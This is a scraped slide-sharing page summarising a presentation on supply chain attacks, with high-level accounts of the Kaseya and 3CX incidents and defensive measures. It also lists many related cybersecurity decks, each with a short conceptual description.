Supply Chain Attacks
•
0 likes•526 views
This document discusses supply chain attacks and provides examples of recent attacks. It defines supply chain attacks as compromising enterprise networks via third party applications or entities. The document then summarizes the anatomy and timeline of the Kaseya and 3CX ransomware attacks. In the Kaseya attack, a malicious task was deployed to VSA servers which then pushed ransomware downstream. The 3CX attack involved a trojanized software update that bundled a malicious DLL leading to data theft. Finally, the document outlines defenses such as software inventory, access controls, and secure development practices to help prevent supply chain attacks.
Report
Share
Report
Share
Download to read offline
Recommended
Threat Hunting Procedures and Measurement Matrice
This document will provide the basics of Cyber Threat Hunting and answers of some Q such as; What is Threat Hunting?, What is the Importance of Threat Hunting, and How it can be start....Bla..Bla..Bla...
zero day exploits
A zero day vulnerability is an unknown hole in software that is exploited by hackers before the vendor becomes aware of it. These exploits can go undetected for months, allowing malicious activities like monitoring or theft. There is high demand for zero day exploits due to their ability to go undetected for long periods, with the average exploit remaining undetected for over 300 days. Once a vulnerability is publicly known, patches can be released and it is no longer considered a zero day exploit.
Threat Hunting
The document is a presentation on threat hunting with Splunk. It discusses threat hunting basics, data sources for threat hunting, knowing your endpoint, and using the cyber kill chain framework. It outlines an agenda that includes a hands-on walkthrough of an attack scenario using Splunk's core capabilities. It also discusses advanced threat hunting techniques and tools, enterprise security walkthroughs, and applying machine learning and data science to security.
Introduction to Malware Analysis
This document provides an overview of malware analysis, including both static and dynamic analysis techniques. Static analysis involves examining a file's code and components without executing it, such as identifying file types, checking hashes, and viewing strings. Dynamic analysis involves executing the malware in a controlled environment and monitoring its behavior and any system changes. Dynamic analysis tools discussed include Process Explorer, Process Monitor, and Autoruns to track malware processes, files accessed, and persistence mechanisms. Both static and dynamic analysis are needed to fully understand malware behavior.
Bsides 2019 - Intelligent Threat Hunting
This document outlines an overview of intelligent threat hunting presented by Dhruv Majumdar. It discusses the basics of threat hunting, including that it is a proactive and iterative process to detect threats that evade existing security solutions. It provides a threat hunting recipe and describes important data sources and skills needed like host analysis, network analysis, and threat intelligence. It also walks through an attack scenario and things to look for at different stages of an attack lifecycle. Finally, it concludes with the growing demand for threat hunters and recommendations on how to get started with threat hunting.
Threat hunting and achieving security maturity
The document discusses threat hunting techniques and achieving maturity in threat hunting programs. It introduces threat hunting and defines it as proactively searching networks to detect advanced threats. It then covers threat hunting maturity models ranging from initial to leading levels. Common threat hunting techniques like searching, clustering, grouping and stack counting are explained. The threat hunting loop process of creating hypotheses, investigating, uncovering patterns and informing analytics is also outlined. Finally, two practical threat hunting case studies on potential command and control activity and suspicious emails are described.
MITRE ATT&CK Framework
The document discusses the MITRE ATT&CK framework, which is a knowledge base of adversary behaviors and tactics collected from real-world observations. It describes how the framework categorizes behaviors using tactics, techniques, and procedures. The framework can be used for threat intelligence, detection and analytics, adversary emulation, and assessment and engineering. The document provides examples of how organizations can map their detection capabilities and data sources to techniques in the framework to improve visibility of attacks. It cautions against misusing the framework as a checklist rather than taking a threat-informed approach.
Effective Threat Hunting with Tactical Threat Intelligence
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
Recommended
Threat Hunting Procedures and Measurement Matrice
This document will provide the basics of Cyber Threat Hunting and answers of some Q such as; What is Threat Hunting?, What is the Importance of Threat Hunting, and How it can be start....Bla..Bla..Bla...
zero day exploits
A zero day vulnerability is an unknown hole in software that is exploited by hackers before the vendor becomes aware of it. These exploits can go undetected for months, allowing malicious activities like monitoring or theft. There is high demand for zero day exploits due to their ability to go undetected for long periods, with the average exploit remaining undetected for over 300 days. Once a vulnerability is publicly known, patches can be released and it is no longer considered a zero day exploit.
Threat Hunting
The document is a presentation on threat hunting with Splunk. It discusses threat hunting basics, data sources for threat hunting, knowing your endpoint, and using the cyber kill chain framework. It outlines an agenda that includes a hands-on walkthrough of an attack scenario using Splunk's core capabilities. It also discusses advanced threat hunting techniques and tools, enterprise security walkthroughs, and applying machine learning and data science to security.
Introduction to Malware Analysis
This document provides an overview of malware analysis, including both static and dynamic analysis techniques. Static analysis involves examining a file's code and components without executing it, such as identifying file types, checking hashes, and viewing strings. Dynamic analysis involves executing the malware in a controlled environment and monitoring its behavior and any system changes. Dynamic analysis tools discussed include Process Explorer, Process Monitor, and Autoruns to track malware processes, files accessed, and persistence mechanisms. Both static and dynamic analysis are needed to fully understand malware behavior.
Bsides 2019 - Intelligent Threat Hunting
This document outlines an overview of intelligent threat hunting presented by Dhruv Majumdar. It discusses the basics of threat hunting, including that it is a proactive and iterative process to detect threats that evade existing security solutions. It provides a threat hunting recipe and describes important data sources and skills needed like host analysis, network analysis, and threat intelligence. It also walks through an attack scenario and things to look for at different stages of an attack lifecycle. Finally, it concludes with the growing demand for threat hunters and recommendations on how to get started with threat hunting.
Threat hunting and achieving security maturity
The document discusses threat hunting techniques and achieving maturity in threat hunting programs. It introduces threat hunting and defines it as proactively searching networks to detect advanced threats. It then covers threat hunting maturity models ranging from initial to leading levels. Common threat hunting techniques like searching, clustering, grouping and stack counting are explained. The threat hunting loop process of creating hypotheses, investigating, uncovering patterns and informing analytics is also outlined. Finally, two practical threat hunting case studies on potential command and control activity and suspicious emails are described.
MITRE ATT&CK Framework
The document discusses the MITRE ATT&CK framework, which is a knowledge base of adversary behaviors and tactics collected from real-world observations. It describes how the framework categorizes behaviors using tactics, techniques, and procedures. The framework can be used for threat intelligence, detection and analytics, adversary emulation, and assessment and engineering. The document provides examples of how organizations can map their detection capabilities and data sources to techniques in the framework to improve visibility of attacks. It cautions against misusing the framework as a checklist rather than taking a threat-informed approach.
Effective Threat Hunting with Tactical Threat Intelligence
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
MITRE ATT&CK framework
MITRE ATT&CK framework is about the framework that is followed by Threat Hunters, Threat Analysts for Threat Modelling purpose, which can be use for Adversary Emulation and Attack Defense. Cybersecurity Analyst widely use it for framing the attack through its various used Tactics and Techniques.
Red Team Framework
Presented at the DEFCON27 Red Team Offensive Village on 8/10/19.
From the dawn of technology, adversaries have been present. They have ranged from criminal actors and curious children to - more modernly - nation states and organized crime. As an industry, we started to see value in emulating bad actors and thus the penetration test was born. As time passes, these engagements become less about assessing the true security of the target organization and more about emulating other penetration testers. Furthermore, these tests have evolved into a compliance staple that results in little improvement and increasingly worse emulation of bad actors.
In this presentation, we will provide a framework complementary to the Penetration Testing Execution Standard (PTES). This complementary work, the Red Team Framework (RTF), focuses on the objectives and scoping of adversarial emulation with increased focus on the perspective of the business, their threat models, and business models. The RTF borrows part of the PTES, adding emphasis on detection capabilities as well as purple team engagements. We believe this approach will better assist organizations and their defensive assets in understanding threats and building relevant detections.
Cyber threat intelligence ppt
Cyber threat intelligence (CTI) involves collecting, evaluating, and analyzing cyber threat information using expertise and all-source information to provide insight and understanding of complex cyber situations. CTI can include tactical, operational, and strategic intelligence about security events, indicators of compromise, malware behavior, threat actors, and mapping online threats to geopolitical events over short, medium, and long timeframes. Implementing CTI enables organizations to prepare for and respond to existing and unknown threats through evidence-based knowledge and actionable advice beyond just reactive defense measures.
Windows Threat Hunting
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
OWASP Top 10 2021 What's New
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
Threat hunting 101 by Sandeep Singh
Getting Started with Threat Hunting (Threat Hunting 101) by Sandeep Singh at the combined null Delhi and OWASP Delhi December meet up
Cyber Threat Intelligence
The document discusses cyber threat intelligence and collaborative threat intelligence. It provides an overview of malware trends, requirements for developing threat intelligence capabilities, and principles for managing threat intelligence proactively. The document advocates for a collaborative threat intelligence framework to enable preventative response by identifying and blocking known attackers across multiple organizations through automated and real-time threat information sharing. Standards and tools discussed include IODEF, CIF and how CIF can be used to gather, identify, respond to and mitigate threats based on indicators collected from various sources.
Threat Modelling
This document discusses threat modeling for software applications. It covers the key stages of threat modeling including decomposing the application, determining and ranking threats using STRIDE, and determining countermeasures. Specific topics covered include threat modeling approaches, data flow diagrams, trust levels, the STRIDE framework for analyzing spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege threats. It also discusses mobile threat modeling and provides an example threat analysis of a student results portal application.
Cyber security and demonstration of security tools
Presentation on Cybersecurity and demonstration of security tools, conducted by Vicky Fernandes on 10th September 2019 at Don Bosco Institute of Technology, Mumbai.
Cyber Security Incident Response
This presentation has been delivered by Michael Redmond at the PECB Insights Conference 2018 in Paris
Infocyte - Digital Forensics and Incident Response (DFIR) Training Session
Join Infocyte co-founder and Chief Product Officer, Chris Gerritz, for a two-hour digital forensics and incident response (DFIR) training session.
During this presentation, Chris shows participants how to set up Infocyte's managed detection and response (MDR) platform and how to leverage Infocyte to detect, investigate, isolate, and eliminate sophisticated cyber threats. Additionally, Infocyte helps enterprise cyber security teams eliminate hidden IT risks, improve security hygiene, maintain compliance, and streamline security operations—including improving the capabilities of existing endpoint security tools.
Using Infocyte's new extensions, participants are encouraged to custom create their own collection (detection and analysis) and action (incident response) extensions.
Malware Static Analysis
This document discusses techniques for analyzing malware samples without executing them. It covers static analysis methods like identifying the file type and architecture, fingerprinting with hashes, scanning for known signatures, extracting strings, analyzing the PE header, and comparing samples. The goal of static analysis is to learn as much as possible about the malware before executing it, in order to focus subsequent dynamic analysis efforts. Manual and automated tools are described throughout for performing static analysis tasks like string extraction, unpacking obfuscated files, and classifying samples.
Misp(malware information sharing platform)
A threat intelligence platform for sharing, storing and correlating Indicators of Compromise of targeted attacks, threat intelligence, financial fraud information, vulnerability information or even counter-terrorism information. Discover how MISP is used today in multiple organisations. Not only to store, share, collaborate on cyber security indicators, malware analysis, but also to use the IoCs and information to detect and prevent attacks or threats against ICT infrastructures, organisations or people.
Web Application Penetration Testing
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
Introduction to MITRE ATT&CK
Presentation talks about introduction to MITRE ATT&CK Framework, different use cases, pitfalls to take care about.. Talk was delivered @Null Bangalore and @OWASP Bangalore chapter on 15th February 2019.
Cyber Threat Hunting Workshop
Slide presentation for Cyber Threat Hunting Workshop at International Telecommunication Union (ITU) Global Cyber Drill 2020 Event.
Hunting Lateral Movement in Windows Infrastructure
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
Red team Engagement
The document discusses red team penetration testing and modern cybersecurity risks. It provides an overview of red teaming, including thinking like a sophisticated attacker to uncover security weaknesses through external and internal network exploitation, web application attacks, and social engineering. The document notes that Indian organizations are at high risk of cyber attacks due to poor cyber defenses, lack of awareness, and internal threats. Mitigations include increasing cybersecurity education and budgeting.
PHDays 2018 Threat Hunting Hands-On Lab
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
Threat Hunting with Splunk Hands-on
The document discusses threat hunting techniques using Splunk, including an overview of threat hunting basics, data sources for threat hunting, and Lockheed Martin's Cyber Kill Chain model. It provides examples of using endpoint data to hunt for threats across the kill chain by analyzing processes, communications, and file artifacts in a demo dataset. Advanced techniques discussed include hunting for SQL injection attacks and lateral movement.
virusessssßsssssssssssssssssssssssssssssssss.ppt
This document discusses the topic of malware. It provides examples of different types of malware like viruses, worms, trojan horses, rootkits, spyware, ransomware and botnets. It describes key features of different malware types and provides the example of the Morris Worm, one of the first major internet worms, which spread rapidly in 1988 exploiting vulnerabilities in remote login programs, sendmail's debug mode and the finger daemon. The document also discusses faster spreading worms like Code Red and Slammer, and email spreading worms like Love Bug. It outlines the timeline and key events related to the Stuxnet worm targeting Siemens industrial control systems.
More Related Content
What's hot
MITRE ATT&CK framework
MITRE ATT&CK framework is about the framework that is followed by Threat Hunters, Threat Analysts for Threat Modelling purpose, which can be use for Adversary Emulation and Attack Defense. Cybersecurity Analyst widely use it for framing the attack through its various used Tactics and Techniques.
Red Team Framework
Presented at the DEFCON27 Red Team Offensive Village on 8/10/19.
From the dawn of technology, adversaries have been present. They have ranged from criminal actors and curious children to - more modernly - nation states and organized crime. As an industry, we started to see value in emulating bad actors and thus the penetration test was born. As time passes, these engagements become less about assessing the true security of the target organization and more about emulating other penetration testers. Furthermore, these tests have evolved into a compliance staple that results in little improvement and increasingly worse emulation of bad actors.
In this presentation, we will provide a framework complementary to the Penetration Testing Execution Standard (PTES). This complementary work, the Red Team Framework (RTF), focuses on the objectives and scoping of adversarial emulation with increased focus on the perspective of the business, their threat models, and business models. The RTF borrows part of the PTES, adding emphasis on detection capabilities as well as purple team engagements. We believe this approach will better assist organizations and their defensive assets in understanding threats and building relevant detections.
Cyber threat intelligence ppt
Cyber threat intelligence (CTI) involves collecting, evaluating, and analyzing cyber threat information using expertise and all-source information to provide insight and understanding of complex cyber situations. CTI can include tactical, operational, and strategic intelligence about security events, indicators of compromise, malware behavior, threat actors, and mapping online threats to geopolitical events over short, medium, and long timeframes. Implementing CTI enables organizations to prepare for and respond to existing and unknown threats through evidence-based knowledge and actionable advice beyond just reactive defense measures.
Windows Threat Hunting
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
OWASP Top 10 2021 What's New
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
Threat hunting 101 by Sandeep Singh
Getting Started with Threat Hunting (Threat Hunting 101) by Sandeep Singh at the combined null Delhi and OWASP Delhi December meet up
Cyber Threat Intelligence
The document discusses cyber threat intelligence and collaborative threat intelligence. It provides an overview of malware trends, requirements for developing threat intelligence capabilities, and principles for managing threat intelligence proactively. The document advocates for a collaborative threat intelligence framework to enable preventative response by identifying and blocking known attackers across multiple organizations through automated and real-time threat information sharing. Standards and tools discussed include IODEF, CIF and how CIF can be used to gather, identify, respond to and mitigate threats based on indicators collected from various sources.
Threat Modelling
This document discusses threat modeling for software applications. It covers the key stages of threat modeling including decomposing the application, determining and ranking threats using STRIDE, and determining countermeasures. Specific topics covered include threat modeling approaches, data flow diagrams, trust levels, the STRIDE framework for analyzing spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege threats. It also discusses mobile threat modeling and provides an example threat analysis of a student results portal application.
Cyber security and demonstration of security tools
Presentation on Cybersecurity and demonstration of security tools, conducted by Vicky Fernandes on 10th September 2019 at Don Bosco Institute of Technology, Mumbai.
Cyber Security Incident Response
This presentation has been delivered by Michael Redmond at the PECB Insights Conference 2018 in Paris
Infocyte - Digital Forensics and Incident Response (DFIR) Training Session
Join Infocyte co-founder and Chief Product Officer, Chris Gerritz, for a two-hour digital forensics and incident response (DFIR) training session.
During this presentation, Chris shows participants how to set up Infocyte's managed detection and response (MDR) platform and how to leverage Infocyte to detect, investigate, isolate, and eliminate sophisticated cyber threats. Additionally, Infocyte helps enterprise cyber security teams eliminate hidden IT risks, improve security hygiene, maintain compliance, and streamline security operations—including improving the capabilities of existing endpoint security tools.
Using Infocyte's new extensions, participants are encouraged to custom create their own collection (detection and analysis) and action (incident response) extensions.
Malware Static Analysis
This document discusses techniques for analyzing malware samples without executing them. It covers static analysis methods like identifying the file type and architecture, fingerprinting with hashes, scanning for known signatures, extracting strings, analyzing the PE header, and comparing samples. The goal of static analysis is to learn as much as possible about the malware before executing it, in order to focus subsequent dynamic analysis efforts. Manual and automated tools are described throughout for performing static analysis tasks like string extraction, unpacking obfuscated files, and classifying samples.
Misp(malware information sharing platform)
A threat intelligence platform for sharing, storing and correlating Indicators of Compromise of targeted attacks, threat intelligence, financial fraud information, vulnerability information or even counter-terrorism information. Discover how MISP is used today in multiple organisations. Not only to store, share, collaborate on cyber security indicators, malware analysis, but also to use the IoCs and information to detect and prevent attacks or threats against ICT infrastructures, organisations or people.
Web Application Penetration Testing
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
Introduction to MITRE ATT&CK
Presentation talks about introduction to MITRE ATT&CK Framework, different use cases, pitfalls to take care about.. Talk was delivered @Null Bangalore and @OWASP Bangalore chapter on 15th February 2019.
Cyber Threat Hunting Workshop
Slide presentation for Cyber Threat Hunting Workshop at International Telecommunication Union (ITU) Global Cyber Drill 2020 Event.
Hunting Lateral Movement in Windows Infrastructure
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
Red team Engagement
The document discusses red team penetration testing and modern cybersecurity risks. It provides an overview of red teaming, including thinking like a sophisticated attacker to uncover security weaknesses through external and internal network exploitation, web application attacks, and social engineering. The document notes that Indian organizations are at high risk of cyber attacks due to poor cyber defenses, lack of awareness, and internal threats. Mitigations include increasing cybersecurity education and budgeting.
PHDays 2018 Threat Hunting Hands-On Lab
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
Threat Hunting with Splunk Hands-on
The document discusses threat hunting techniques using Splunk, including an overview of threat hunting basics, data sources for threat hunting, and Lockheed Martin's Cyber Kill Chain model. It provides examples of using endpoint data to hunt for threats across the kill chain by analyzing processes, communications, and file artifacts in a demo dataset. Advanced techniques discussed include hunting for SQL injection attacks and lateral movement.
What's hot (20)
Cyber security and demonstration of security tools
Cyber security and demonstration of security tools
Infocyte - Digital Forensics and Incident Response (DFIR) Training Session
Infocyte - Digital Forensics and Incident Response (DFIR) Training Session
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Similar to Supply Chain Attacks
virusessssßsssssssssssssssssssssssssssssssss.ppt
This document discusses the topic of malware. It provides examples of different types of malware like viruses, worms, trojan horses, rootkits, spyware, ransomware and botnets. It describes key features of different malware types and provides the example of the Morris Worm, one of the first major internet worms, which spread rapidly in 1988 exploiting vulnerabilities in remote login programs, sendmail's debug mode and the finger daemon. The document also discusses faster spreading worms like Code Red and Slammer, and email spreading worms like Love Bug. It outlines the timeline and key events related to the Stuxnet worm targeting Siemens industrial control systems.
Security & Privacy - Lecture B
This lecture discusses common methods of cyberattack and types of malware. Some methods of attack explored include packet sniffing to intercept internet traffic, software attacks like trojans and viruses, and social engineering through phishing and hoaxes. Common types of malware described are trojans, viruses, worms, rootkits, adware, spyware, and ransomware. Social engineering methods used by cybercriminals like phishing are also explained.
SplunkLive! Stockholm 2015 breakout - Analytics based security
This document discusses how Splunk can be used for security analytics and threat detection. It describes how Splunk allows organizations to centrally gather and correlate security-related data from various sources like networks, endpoints, applications and threat intelligence feeds. This enables use cases like monitoring for known threats, detecting unknown threats, incident investigation and user behavior analytics. Advanced techniques like machine learning and user/entity behavior analytics are also discussed to help identify anomalous activity that could indicate security incidents or threats.
Ransomware ly
This document provides an overview of ransomware presented by Lisa Young. It begins with her background and experience in IT. The presentation defines ransomware, outlines its history from 2005, and provides statistics on its growth. It describes how ransomware works, common types like encryption and lock screen variants, and examples of major ransomware like Cryptolocker, Cryptowall, and WannaCry. Tips are provided on how to avoid ransomware through patching, backups, and security awareness training. Controls from the HITRUST framework are also mapped that relate to preventing and recovering from ransomware.
Protecting Your organization from WannaCry Ransomware
WannaCry Ransomware explained in details, a better understanding about Ransomware and how to stay protected from it.
Хакеро-машинный интерфейс
Докладчики представят подробный анализ, проведенный на основе исследования более 200 уязвимостей в SCADA и HMI. Вы сможете ознакомиться с подробным описанием популярных типов уязвимостей в решениях крупнейших производителей, таких как Schneider Electric, Siemens, General Electric и Advantech. Вы узнаете о том, как обнаружить критически опасные уязвимости в базовом коде. В докладе будут сопоставляться активность разных производителей в выпуске исправлений, а также сегменты SCADA с другими сегментами рынка программного обеспечения. Вниманию разработчиков и операторов будут предоставлены рекомендации, которые позволят снизить вероятность осуществления атак, а также прогнозы касательно дальнейших тенденций развития атак.
News bytes null 200314121904
This document summarizes several cybersecurity news stories from March 2020. It discusses how scammers were exploiting fears around the coronavirus pandemic, hundreds of malicious Chrome extensions that stole user data, Microsoft releasing antivirus software for Linux, a vulnerability in WiFi encryption that could allow decrypting communications, a ransomware attack on a defense contractor that resulted in a $500,000 ransom payment, research into using ultrasonic waves to control audio devices for surveillance purposes, two new side-channel attacks affecting AMD processors, an unfixable flaw in Intel chips, and an operation that disabled the Necurs botnet through domain prediction.
NULL Mumbai NewsBytes
This document summarizes several cybersecurity news stories from March 2020. It discusses how scammers were exploiting fears around the coronavirus pandemic, hundreds of malicious Chrome extensions that stole user data, Microsoft releasing antivirus software for Linux, a vulnerability in WiFi encryption that could allow decrypting communications, a ransomware attack on a defense contractor that resulted in a $500,000 ransom payment, research into using ultrasonic waves to control audio devices for surveillance, and vulnerabilities found in AMD and Intel processors. It also summarizes the takedown of the massive Necurs botnet by Microsoft through predicting its domain generation algorithm.
SplunkLive! Amsterdam 2015 - Analytics based security breakout
Splunk products provide a flexible and fast security intelligence platform that makes security personnel and processes more efficient by providing quick and flexible access to all of the data and information needed to detect, investigate and remediate threats. This presentation will discuss best practices for building out or enhancing an analytics based security strategy and how Splunk products can make people, process, and technology work better together.
Hacking - penetration tools
In this ppt file, penetration tools used for red teaming and pen testing used before hacking, during information gathering are explained briefly.
Catch Me If You Can - Finding APTs in your network
Adrian Tudor & Leo Neagu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Computer security: hackers and Viruses
This document discusses computer security and provides information on viruses, hackers, and protection strategies. It defines computer security and outlines common security measures like data encryption and passwords. It describes different types of viruses like time bombs, logical bombs, worms, and trojans. It also defines different types of hackers like white hats, black hats, and script kiddies. The document concludes by emphasizing that computer security requires ongoing efforts as hackers evolve their techniques in response to increased protections.
What you need to know about ExPetr ransomware
1. A ransomware variant called ExPetr first appeared on June 27th, 2017 that affected systems globally through multiple infection vectors.
2. It spreads through stolen credentials and unpatched vulnerabilities, encrypting files using AES128 and displaying fake decryption instructions.
3. Mitigations include patching known exploits like EternalBlue, disabling SMBv1, securing Active Directory, and maintaining offline backups.
Ransomware: How to avoid a crypto crisis at your IT business
Cryptolocker and other ransomware brought crisis to thousands of businesses last year. The malware made millions by encrypting victims’ files and demanding ransoms to unlock them. Some companies lost everything. Others, including local police departments, had to pay a hefty ransom to recover their data.
Today, Cryptolocker is gone, but ransomware is growing stronger. New variants such as CryptoWall and Critroni are infecting users, locking their files, and demanding higher ransoms. How can you protect your IT business and clients from this growing threat?
Join Calyptix Security for a conversation on crypto-ransomware, where it’s headed, and how to avoid a ‘crypto crisis’ at your office. You’ll get straight-forward advice on how to stop this threat from impacting your business network security and clients.
Video recording of this webinar took place on March 12, 2015
Anatomy of an Advanced Retail Breach
1. The document discusses an advanced retail breach where an attacker was able to access a third party contractor's system after phishing their credentials, use that to access the retailer's internal file server, infect POS systems with malware to scrape credit card data from RAM, send the data to an internal server, and then exfiltrate it to external FTP servers in Russia.
2. The IBM X-Force monitors threats and educates customers on security challenges. It analyzed this attack to understand how the attacker was able to compromise systems and extract card data without detection.
3. The document provides recommendations to prevent similar attacks, such as endpoint protection, network segmentation, monitoring and detection of anomalies, and incident response planning.
14_526_topic10.ppt
This document discusses various types of malware including viruses, worms, trojan horses, backdoors, logic bombs, spyware, scareware, ransomware and botnets. It provides examples of specific malware like the Morris Worm, Nimda Worm, MyDoom, and Slammer. It also covers how malware has evolved over time to spread faster through vectors like email attachments, file sharing and exploiting vulnerabilities. Malware goals have expanded from simple replication to include identity theft, ransom demands, and distributed denial of service attacks.
14_526_topic10.ppt
This document discusses various types of malware including viruses, worms, trojan horses, backdoors, logic bombs, spyware, scareware, ransomware and botnets. It provides examples of specific malware like the Morris Worm, Nimda Worm, MyDoom, and Slammer. It also covers how malware has evolved over time to spread faster through vectors like email attachments, file sharing and exploiting vulnerabilities. Malware goals have expanded from simple replication to include identity theft, ransom demands, and distributed denial of service attacks.
14_526_topic10.ppt
This document provides information about various types of malware:
- It describes common malware types like viruses, worms, trojan horses, backdoors, logic bombs, spyware, scareware, and ransomware. It provides examples of each.
- It discusses the Morris worm, the first major computer worm, which spread in 1988 and caused network outages but had no malicious payload.
- It analyzes the fast spreading SQL Slammer worm of 2003, which infected entire vulnerable networks in under 10 minutes by exploiting a buffer overflow in Microsoft SQL Server.
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Environments IT Defense 2013/Shmoocon Epilogue 2013
Similar to Supply Chain Attacks (20)
formation malware CSC50 pour les attaque malware .ppt
formation malware CSC50 pour les attaque malware .ppt
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based security
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakout
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
Ransomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT business
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Recently uploaded
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Climate Impact of Software Testing at Nordic Testing Days
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Presentation of the OECD Artificial Intelligence Review of Germany
Consult the full report at https://www.oecd.org/digital/oecd-artificial-intelligence-review-of-germany-609808d6-en.htm
Infrastructure Challenges in Scaling RAG with Custom AI models
Building Retrieval-Augmented Generation (RAG) systems with open-source and custom AI models is a complex task. This talk explores the challenges in productionizing RAG systems, including retrieval performance, response synthesis, and evaluation. We’ll discuss how to leverage open-source models like text embeddings, language models, and custom fine-tuned models to enhance RAG performance. Additionally, we’ll cover how BentoML can help orchestrate and scale these AI components efficiently, ensuring seamless deployment and management of RAG systems in the cloud.
HCL Notes and Domino License Cost Reduction in the World of DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
